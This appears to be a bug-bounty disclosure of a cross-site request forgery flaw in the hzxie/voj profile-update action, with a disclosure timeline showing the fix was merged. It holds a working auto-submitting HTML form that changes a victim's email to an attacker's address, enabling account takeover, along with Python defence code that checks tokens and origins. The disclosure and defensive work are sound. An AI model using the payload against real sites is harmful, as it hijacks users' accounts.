Cross-Site Request Forgery (CSRF) in hzxie/voj

Status: Valid

Reported on Sep 9th 2021


✍️ Description

The Update Profile action has no CSRF protection. An attacker can therefore change a logged-in user's email address from a cross-site page, and the new address can then be used with the Reset Password functionality to take over the account.

🕵️‍♂️ Proof of Concept

1. Log in as a user.

2. Open the PoC.html file.

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://verwandlung.org/accounts/updateProfile.action" method="POST">
      <input type="hidden" name="email" value="attacker&#64;gmail&#46;com" />
      <input type="hidden" name="location" value="" />
      <input type="hidden" name="website" value="" />
      <input type="hidden" name="socialLinks" value="&#123;&#125;" />
      <input type="hidden" name="aboutMe" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

You can see that the user's email has been changed to the address set in the PoC (attacker@gmail.com).

💥 Impact

This vulnerability can be used to take control of users' accounts.
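As an added example (not code from the report or from the hzxie/voj project), the following Python sketch shows the server-side checks that would stop the PoC form above: a session-bound synchronizer token that a cross-site page cannot read or supply, an Origin/Referer check as defence in depth, and a SameSite=Lax session cookie so the forged top-level POST arrives without the victim's session. The server secret, the cookie name `session`, the `csrf_token` field name and the sample requests are assumptions constructed for this example; the form field names and target origin are taken from the PoC.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

# Hypothetical server-side values, constructed for this example (not from voj).
SERVER_SECRET = secrets.token_bytes(32)
SITE_ORIGIN = "https://verwandlung.org"   # origin the PoC form posts to


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session: HMAC(secret, session_id).
    The server embeds it in its own profile form; a cross-site page cannot
    read it, so a forged POST cannot include a valid one."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for the session cookie (cookie name is hypothetical).
    SameSite=Lax keeps the cookie off cross-site top-level POSTs such as the
    auto-submitted PoC form, so the forged request is unauthenticated."""
    return f"session={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


def origin_is_trusted(headers: dict) -> bool:
    """Defence in depth: a state-changing request must carry an Origin
    (or Referer) header and it must match the site's own origin.
    Design choice: a missing header is treated as untrusted."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parsed = urlparse(source)
    return f"{parsed.scheme}://{parsed.netloc}" == SITE_ORIGIN


def handle_update_profile(session_id: str, headers: dict, form: dict):
    """Server-side handler for the updateProfile action.
    Returns (status, message); the profile changes only if every check passes."""
    if not origin_is_trusted(headers):
        return 403, "cross-site request rejected (Origin/Referer mismatch)"
    submitted = form.get("csrf_token", "")
    expected = issue_csrf_token(session_id)
    # Constant-time comparison so token validity cannot be probed via timing.
    if not hmac.compare_digest(submitted, expected):
        return 403, "missing or invalid CSRF token"
    # All checks passed: apply the change (persistence omitted here).
    return 200, f"email updated to {form['email']}"


# --- Constructed sample requests -------------------------------------------
VICTIM_SESSION = "victim-session-id"

# The forged request exactly as the PoC.html form would produce it: every
# profile field present, but no token and a foreign Origin.
FORGED_REQUEST = {
    "headers": {"Origin": "https://attacker.example"},
    "form": {"email": "attacker@gmail.com", "location": "", "website": "",
             "socialLinks": "{}", "aboutMe": ""},
}


def legitimate_request() -> dict:
    """A request from the site's own profile page, carrying the user's token."""
    return {
        "headers": {"Origin": SITE_ORIGIN},
        "form": {"email": "user@example.com",
                 "csrf_token": issue_csrf_token(VICTIM_SESSION)},
    }


if __name__ == "__main__":
    print(handle_update_profile(VICTIM_SESSION, **FORGED_REQUEST))        # 403
    print(handle_update_profile(VICTIM_SESSION, **legitimate_request()))  # 200
    print(session_cookie_header(VICTIM_SESSION))
```

Either of the first two checks alone defeats the PoC; keeping both, plus the SameSite cookie attribute, means a single misconfiguration (a framework that strips Referer, a browser that does not enforce SameSite) does not reopen the hole. A token issued for one session is rejected for another, so an attacker cannot reuse a token from their own account.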

a month ago: We have contacted a member of the hzxie/voj team and are waiting to hear back.

a month ago: We have sent a second follow up to the hzxie/voj team. We will try again in 10 days.

a month ago: hzxie validated this vulnerability.

amammad has been awarded the disclosure bounty.

The fix bounty is now up for grabs.

a month ago: hzxie confirmed that a fix has been merged on 74c17a.

The fix bounty has been dropped.